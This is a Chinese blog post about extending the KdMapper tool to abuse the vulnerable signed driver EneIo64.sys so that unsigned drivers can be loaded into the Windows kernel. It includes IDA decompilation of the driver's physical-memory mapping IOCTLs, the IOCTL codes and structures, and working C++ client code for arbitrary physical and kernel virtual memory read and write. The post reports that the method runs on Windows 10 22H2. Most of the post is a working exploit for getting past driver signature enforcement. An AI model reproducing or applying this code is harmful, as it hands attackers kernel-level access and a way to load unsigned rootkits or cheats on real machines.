1.背景
KdMapper是一个利用intel的驱动漏洞可以无痕的加载未经签名的驱动,本文是利用其它漏洞(参考《【转载】利用签名驱动漏洞加载未签名驱动》)做相应的修改以实现类似功能。需要大家对KdMapper的代码有一定了解。
2.驱动信息
驱动名称 | EneIo64.sys |
时间戳 | 5AB08710 |
MD5 | 11FB599312CB1CF43CA5E879ED6FB71E |
3.IDA分析
3.1 入口函数:
NTSTATUS __stdcall DriverEntry(_DRIVER_OBJECT* DriverObject, PUNICODE_STRING RegistryPath)
{
int v3; // ebx
struct _UNICODE_STRING DestinationString; // [rsp+40h] [rbp-28h] BYREF
struct _UNICODE_STRING SymbolicLinkName; // [rsp+50h] [rbp-18h] BYREF
PDEVICE_OBJECT DeviceObject; // [rsp+80h] [rbp+18h] BYREF
DeviceObject = 0i64;
DbgPrint("Entering DriverEntry", RegistryPath);
RtlInitUnicodeString(&DestinationString, L"\\Device\\EneIo");
v3 = IoCreateDevice(DriverObject, 0, &DestinationString, 0x8010u, 0, 0, &DeviceObject);
if (v3 < 0)
{
DbgPrint("ERROR: IoCreateDevice failed");
}
else
{
DriverObject->MajorFunction[14] = (PDRIVER_DISPATCH)sub_11100;
DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)sub_11100;
DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)sub_11100;
DriverObject->DriverUnload = (PDRIVER_UNLOAD)DriverUnload;
RtlInitUnicodeString(&SymbolicLinkName, L"\\DosDevices\\EneIo");
v3 = IoCreateSymbolicLink(&SymbolicLinkName, &DestinationString);
if (v3 < 0)
{
DbgPrint("ERROR: IoCreateSymbolicLink failed");
IoDeleteDevice(DeviceObject);
}
}
DbgPrint("Leaving DriverEntry");
return v3;
}
3.2 IRP_MJ_DEVICE_CONTROL
IRP_MJ_DEVICE_CONTROL对应的函数 sub_11100,其代码如下:
__int64 __fastcall sub_11100(_DEVICE_OBJECT* pDeviceObject, IRP* pIrp)
{
_IO_STACK_LOCATION* pIosp; // rsi
MAP_PHYSICAL_MEMORY_INFO* pPhysicalMemoryInfo; // rbp
......
pIosp = pIrp->Tail.Overlay.CurrentStackLocation;
pPhysicalMemoryInfo = (MAP_PHYSICAL_MEMORY_INFO*)pIrp->AssociatedIrp.SystemBuffer;
nInputBufferLength = pIosp->Parameters.DeviceIoControl.InputBufferLength;
switch (pIosp->MajorFunction)
{
......
case 0xEu:
DbgPrint("IRP_MJ_DEVICE_CONTROL");
nIoControlCode = pIosp->Parameters.DeviceIoControl.IoControlCode;
switch (nIoControlCode)
{
case 0x80102040:
DbgPrint("IOCTL_WINIO_MAPPHYSTOLIN");
if (!(_DWORD)nInputBufferLength)
goto LABEL_13;
memmove(Src, pPhysicalMemoryInfo, nInputBufferLength);
ntStatusV20 = sub_11528((PHYSICAL_ADDRESS)Src[1], Src[0], &BaseAddress, &Handle, &Object);
if (ntStatusV20 >= 0)
{
memmove(pPhysicalMemoryInfo, Src, nInputBufferLength);
pIrp->IoStatus.Information = nInputBufferLength;
}
pIrp->IoStatus.Status = ntStatusV20;
break;
case 0x80102044:
DbgPrint("IOCTL_WINIO_UNMAPPHYSADDR");
if (!(_DWORD)nInputBufferLength)
goto LABEL_13;
memmove(Src, pPhysicalMemoryInfo, nInputBufferLength);
pObjectV16 = Object;
pMappedAddressV17 = BaseAddress;
hSectionV18 = Handle;
DbgPrint("Entering UnmapPhysicalMemory");
ntStatusV19 = ZwUnmapViewOfSection((HANDLE)0xFFFFFFFFFFFFFFFFi64, pMappedAddressV17);
if (ntStatusV19 < 0)
DbgPrint("ERROR: UnmapViewOfSection failed");
if (pObjectV16)
ObfDereferenceObject(pObjectV16);
ZwClose(hSectionV18);
DbgPrint("Leaving UnmapPhysicalMemory");
pIrp->IoStatus.Status = ntStatusV19;
break;
......
default:
DbgPrint("ERROR: Unknown IRP_MJ_DEVICE_CONTROL");
LABEL_13:
pIrp->IoStatus.Status = 0xC000000D;
goto LABEL_50;
}
break;
}
LABEL_50:
v21 = pIrp->IoStatus.Status;
IofCompleteRequest(pIrp, 0);
DbgPrint("Leaving WinIoDispatch");
return v21;
}
其中映射物理内存 ControlCode 为 0x80102040,相应的函数为 sub_11528 , 取消映射为 0x80102044。
3.3 映射物理内存
sub_11528 如下:
__int64 __fastcall sub_11528(PHYSICAL_ADDRESS BusAddress, ULONG_PTR nSize, PVOID* pMappedAddress, void** hSection, PVOID* pObject)
{
PVOID* Object; // rbx
NTSTATUS ntStatus; // edi
BOOLEAN bMapStart; // al
BOOLEAN bMapStartOK; // bl
BOOLEAN bMapEnd; // al
PVOID BaseAddress; // [rsp+50h] [rbp-78h] BYREF
LARGE_INTEGER BusAddressa; // [rsp+58h] [rbp-70h] BYREF
LARGE_INTEGER TranslatedAddress; // [rsp+60h] [rbp-68h] BYREF
union _LARGE_INTEGER SectionOffset; // [rsp+68h] [rbp-60h] BYREF
struct _UNICODE_STRING DestinationString; // [rsp+70h] [rbp-58h] BYREF
struct _OBJECT_ATTRIBUTES ObjectAttributes; // [rsp+80h] [rbp-48h] BYREF
ULONG_PTR CommitSize; // [rsp+D8h] [rbp+10h] BYREF
ULONG AddressSpace; // [rsp+E8h] [rbp+20h] BYREF
CommitSize = nSize;
BaseAddress = 0i64;
DbgPrint("Entering MapPhysicalMemoryToLinearSpace");
RtlInitUnicodeString(&DestinationString, L"\\Device\\PhysicalMemory");
*hSection = 0i64;
Object = pObject;
*pObject = 0i64;
ObjectAttributes.RootDirectory = 0i64;
ObjectAttributes.SecurityDescriptor = 0i64;
ObjectAttributes.SecurityQualityOfService = 0i64;
ObjectAttributes.Length = 48;
ObjectAttributes.Attributes = 64;
ObjectAttributes.ObjectName = &DestinationString;
ntStatus = ZwOpenSection(hSection, 0xF001Fu, &ObjectAttributes);
if (ntStatus < 0)
{
DbgPrint("ERROR: ZwOpenSection failed");
}
else
{
ntStatus = ObReferenceObjectByHandle(*hSection, 0xF001Fu, 0i64, 0, Object, 0i64);
if (ntStatus < 0)
{
DbgPrint("ERROR: ObReferenceObjectByHandle failed");
}
else
{
AddressSpace = 0;
TranslatedAddress = BusAddress;
BusAddressa.QuadPart = BusAddress.QuadPart + CommitSize;
bMapStart = HalTranslateBusAddress(Isa, 0, BusAddress, &AddressSpace, &TranslatedAddress);
AddressSpace = 0;
bMapStartOK = bMapStart;
bMapEnd = HalTranslateBusAddress(Isa, 0, BusAddressa, &AddressSpace, &BusAddressa);
if (bMapStartOK && bMapEnd)
{
SectionOffset = TranslatedAddress;
CommitSize = BusAddressa.QuadPart - TranslatedAddress.QuadPart;
ntStatus = ZwMapViewOfSection(
*hSection,
(HANDLE)0xFFFFFFFFFFFFFFFFi64,
&BaseAddress,
0i64,
BusAddressa.QuadPart - TranslatedAddress.QuadPart,
&SectionOffset,
&CommitSize,
ViewShare,
0,
0x204u);
if (ntStatus == 0xC0000018)
ntStatus = ZwMapViewOfSection(
*hSection,
(HANDLE)0xFFFFFFFFFFFFFFFFi64,
&BaseAddress,
0i64,
CommitSize,
&SectionOffset,
&CommitSize,
ViewShare,
0,
4u);
if (ntStatus >= 0)
{
BaseAddress = (char*)BaseAddress + TranslatedAddress.QuadPart - SectionOffset.QuadPart;
*pMappedAddress = BaseAddress;
}
else
{
DbgPrint("ERROR: ZwMapViewOfSection failed");
}
}
else
{
DbgPrint("ERROR: HalTranslateBusAddress failed");
}
}
}
if (ntStatus < 0)
ZwClose(*hSection);
DbgPrint("Leaving MapPhysicalMemoryToLinearSpace");
return (unsigned int)ntStatus;
}
其使用的是ZwMapViewOfSection将物理内存映射到进程空间。由于使用了物理内存,在代码过程中会遇到物理页面和虚拟页面不一一对应的问题,问题说明及解决办法见《KdMapper扩展中遇到的相关问题》。
3.4 MAP_PHYSICAL_MEMORY_INFO结构
00000000 MAP_PHYSICAL_MEMORY_INFO struc ; (sizeof=0x28, align=0x8, copyof_380)
00000000 Size LARGE_INTEGER ?
00000008 PhysicalAddress PHYSICAL_ADDRESS ?
00000010 hSection dq ? ; offset
00000018 pMappedAddress dq ? ; offset
00000020 pObject dq ? ; offset
00000028 MAP_PHYSICAL_MEMORY_INFO ends
4. 代码实现
4.1 .h文件
#pragma pack(push)
#pragma pack(1)
typedef struct /*DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT)*/_ENEIO64_PHYSICAL_MEMORY_INFO {
LARGE_INTEGER Size;
PHYSICAL_ADDRESS PhysicalAddress;
PVOID hSection;
PVOID pMappedAddress;
PVOID pObject;
} ENEIO64_PHYSICAL_MEMORY_INFO, * PENEIO64_PHYSICAL_MEMORY_INFO;
#pragma pack(pop)
#ifndef RtlOffsetToPointer
#define RtlOffsetToPointer(Base, Offset) ((PCHAR)( ((PCHAR)(Base)) + ((ULONG_PTR)(Offset)) ))
#endif
#ifndef RtlPointerToOffset
#define RtlPointerToOffset(Base, Pointer) ((ULONG)( ((PCHAR)(Pointer)) - ((PCHAR)(Base)) ))
#endif
#define ENEIO64_DEVICE_TYPE (DWORD)0x8010
#define ENEIO64_MAP_SECTION_FUNCID (DWORD)0x810
#define ENEIO64_UNMAP_SECTION_FUNCID (DWORD)0x811
#define IOCTL_ENEIO64_MAP_USER_PHYSICAL_MEMORY \
CTL_CODE(ENEIO64_DEVICE_TYPE, ENEIO64_MAP_SECTION_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80102040
#define IOCTL_ENEIO64_UNMAP_USER_PHYSICAL_MEMORY \
CTL_CODE(ENEIO64_DEVICE_TYPE, ENEIO64_UNMAP_SECTION_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80102044
4.2 .c文件
NTSTATUS asus_driver::SuperCallDriverEx(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
_In_ PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_In_opt_ PVOID OutputBuffer,
_In_opt_ ULONG OutputBufferLength,
_Out_opt_ PIO_STATUS_BLOCK IoStatus)
{
IO_STATUS_BLOCK ioStatus;
NTSTATUS ntStatus = NtDeviceIoControlFile(DeviceHandle,
NULL,
NULL,
NULL,
&ioStatus,
IoControlCode,
InputBuffer,
InputBufferLength,
OutputBuffer,
OutputBufferLength);
if (ntStatus == STATUS_PENDING) {
ntStatus = NtWaitForSingleObject(DeviceHandle,
FALSE,
NULL);
}
if (IoStatus)
*IoStatus = ioStatus;
return ntStatus;
}
BOOL asus_driver::SuperCallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
_In_ PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_In_opt_ PVOID OutputBuffer,
_In_opt_ ULONG OutputBufferLength)
{
BOOL bResult;
IO_STATUS_BLOCK ioStatus;
NTSTATUS ntStatus = SuperCallDriverEx(
DeviceHandle,
IoControlCode,
InputBuffer,
InputBufferLength,
OutputBuffer,
OutputBufferLength,
&ioStatus);
bResult = NT_SUCCESS(ntStatus);
SetLastError(RtlNtStatusToDosError(ntStatus));
return bResult;
}
PVOID asus_driver::SuperMapMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_ ULONG NumberOfBytes,
PVOID* Object,
PHANDLE pHandle
)
{
ULONG_PTR offset;
ULONG mapSize;
ENEIO64_PHYSICAL_MEMORY_INFO request;
RtlSecureZeroMemory(&request, sizeof(request));
offset = PhysicalAddress & ~(PAGE_SIZE - 1);
mapSize = (ULONG)(PhysicalAddress - offset) + NumberOfBytes;
request.PhysicalAddress.QuadPart = PhysicalAddress;
request.Size.QuadPart = mapSize;
request.pMappedAddress = NULL;
request.pObject = NULL;
request.hSection = NULL;
if (SuperCallDriver(DeviceHandle,
IOCTL_ENEIO64_MAP_USER_PHYSICAL_MEMORY,
&request,
sizeof(request),
&request,
sizeof(request)))
{
/*Log(L"[!] SuperMapMemory, Address:0x" << std::setbase(16) << request.MappedBaseAddress << std::endl);*/
if (Object)
{
*Object = request.pObject;
}
if (pHandle)
{
*pHandle = request.hSection;
}
return request.pMappedAddress;
}
return NULL;
}
VOID asus_driver::SuperUnmapMemory(
_In_ HANDLE DeviceHandle,
_In_ PVOID SectionToUnmap,
PVOID Object,
HANDLE Handle
)
{
ENEIO64_PHYSICAL_MEMORY_INFO request;
RtlSecureZeroMemory(&request, sizeof(request));
request.pMappedAddress = SectionToUnmap;
request.pObject = Object;
request.hSection = Handle;
SuperCallDriver(DeviceHandle,
IOCTL_ENEIO64_UNMAP_USER_PHYSICAL_MEMORY,
&request,
sizeof(request),
&request,
sizeof(request));
}
BOOL WINAPI asus_driver::SuperReadWritePhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_reads_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes,
_In_ BOOLEAN DoWrite)
{
BOOL bResult = FALSE;
DWORD dwError = ERROR_SUCCESS;
PVOID mappedSection = NULL;
ULONG_PTR offset;
PVOID Object = NULL;
HANDLE hSection = NULL;
//
// Map physical memory section.
//
mappedSection = SuperMapMemory(DeviceHandle,
PhysicalAddress,
NumberOfBytes,
&Object,
&hSection);
if (mappedSection) {
offset = PhysicalAddress - (PhysicalAddress & ~(PAGE_SIZE - 1));
__try {
if (DoWrite) {
RtlCopyMemory(mappedSection/*RtlOffsetToPointer(mappedSection, offset)*/, Buffer, NumberOfBytes);
}
else {
RtlCopyMemory(Buffer, mappedSection /*RtlOffsetToPointer(mappedSection, offset)*/, NumberOfBytes);
}
bResult = TRUE;
}
__except (EXCEPTION_EXECUTE_HANDLER) {
bResult = FALSE;
dwError = GetExceptionCode();
Log(L"[!] Error AtszioReadWritePhysicalMemory Exception!" << std::endl);
}
//
// Unmap physical memory section.
//
SuperUnmapMemory(DeviceHandle,
mappedSection,
Object,
hSection);
}
else {
dwError = GetLastError();
}
SetLastError(dwError);
return bResult;
}
BOOL WINAPI asus_driver::SuperReadPhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_ PVOID Buffer,
_In_ ULONG NumberOfBytes)
{
return SuperReadWritePhysicalMemory(DeviceHandle,
PhysicalAddress,
Buffer,
NumberOfBytes,
FALSE);
}
BOOL WINAPI asus_driver::SuperWritePhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_reads_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes)
{
return SuperReadWritePhysicalMemory(DeviceHandle,
PhysicalAddress,
Buffer,
NumberOfBytes,
TRUE);
}
BOOL WINAPI asus_driver::SuperWriteKernelVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR Address,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes)
{
BOOL bResult;
ULONG_PTR physicalAddress = 0;
SetLastError(ERROR_SUCCESS);
bResult = SuperVirtualToPhysical(DeviceHandle,
Address,
&physicalAddress);
if (bResult) {
bResult = SuperReadWritePhysicalMemory(DeviceHandle,
physicalAddress,
Buffer,
NumberOfBytes,
TRUE);
}
return bResult;
}
BOOL WINAPI asus_driver::SuperReadKernelVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR Address,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes)
{
BOOL bResult;
ULONG_PTR physicalAddress = 0;
SetLastError(ERROR_SUCCESS);
bResult = SuperVirtualToPhysical(DeviceHandle,
Address,
&physicalAddress);
if (bResult) {
bResult = SuperReadWritePhysicalMemory(DeviceHandle,
physicalAddress,
Buffer,
NumberOfBytes,
FALSE);
}
return bResult;
}
其中 SuperReadKernelVirtualMemory 和 SuperWriteKernelVirtualMemory 读写虚拟地址内存页面中的 虚拟地址转物理地址函数 SuperVirtualToPhysical 的实现在《KdMapper扩展实现之虚拟地址转物理地址 》一文中有介绍。
5. 运行效果
Windows 10 22H2环境上运行的效果如下,其中驱动 HelloWorld.sys为未签名的驱动,其详细说明见文章《KdMapper被加载驱动的实现》。
标签:DbgPrint,ULONG,MEMORY,ENEIO64,sys,KdMapper,ntStatus,EneIo64,PHYSICAL From: https://www.cnblogs.com/ImprisonedSoul/p/17678871.html